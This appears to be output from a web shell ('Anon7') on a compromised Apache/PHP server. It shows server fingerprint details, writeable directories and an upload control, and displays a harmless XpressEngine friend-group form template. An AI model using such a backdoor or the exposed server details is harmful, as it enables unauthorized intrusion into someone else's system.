KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.17
System : Linux localhost 2.6.18-419.el5 #1 SMP Fri Feb 24 22:47:42 UTC 2017 x86_64
User : nobody ( 99)
PHP Version : 5.2.17
Disable Function : NONE
Directory :  /home/queenjbs/xe/modules/communication/skins/default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/queenjbs/xe/modules/communication/skins/default/add_friend_group.html
<!--%import("filter/add_friend_group.xml")-->
<!--%import("js/communication.js")-->

<div id="popHeader">
    <h3 class="xeAdmin">
        <!--@if($friend_group->friend_group_srl)-->
            {$lang->cmd_rename_friend_group}
        <!--@else-->
            {$lang->cmd_add_friend_group}
        <!--@end-->
    </h3>
</div>
<form action="./" method="get" onsubmit="return procFilter(this, add_friend_group)">
<input type="hidden" name="friend_group_srl" value="{$friend_group->friend_group_srl}" />

<div id="popBody">

        <div class="text">
            <p>{$lang->msg_insert_group_name}</p>
            <input name="title" type="text" class="inputTypeText" value="{htmlspecialchars($friend_group->title)}"/>
        </div>
</div>
<div id="popFooter">
    <!--@if($friend_group->friend_group_srl)-->
    <span class="button black strong"><input type="submit" value="{$lang->cmd_modify}" /></span>
    <!--@else-->
    <span class="button black strong"><input type="submit" value="{$lang->cmd_insert}" /></span>
    <!--@end-->
</div>
</form>

Anon7 - 2021